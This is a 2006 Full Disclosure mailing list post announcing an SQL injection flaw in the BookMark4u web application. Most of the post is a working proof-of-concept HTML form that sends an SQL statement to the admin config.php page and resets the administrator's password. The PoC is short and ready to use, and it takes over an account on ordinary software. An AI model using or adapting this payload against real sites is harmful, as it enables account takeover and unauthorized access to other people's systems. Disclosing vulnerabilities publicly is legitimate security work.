Full Disclosure mailing list archives
Sql Injection in BookMark4u
From: "(M.o.H.a.J.a.L.i)" <mohajali2k4 () gmail com>
Date: Thu, 20 Apr 2006 18:46:43 +0200
site: http://bookmark4u.sourceforge.net/ Hello i found a vulnerability in bookmark4u that u can use to make sql injections... the following PoC changes the admin password: [code] <form action='http://bookmark4u.sourceforge.net/v2.0.0/admin/config.php' method='post'> <tr><td align='center'> <input type='hidden' name='sqlcmd' value="# add a administrator (initial password is 'test') %NL%UPDATE bk4u_passwd SET passwd=PASSWORD('asdfg') WHERE user='admin';"> <input type='hidden' name='mode' value='sqlexec'> <input type='submit' value="Execute Above (administrator's account)"> </td></tr> </form></table> <br><a href='javascript:document.location.reload();'>And Reload this page</a>.</body></html> [/code] MoHaJaLi
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Sql Injection in BookMark4u (M.o.H.a.J.a.L.i) (Apr 20)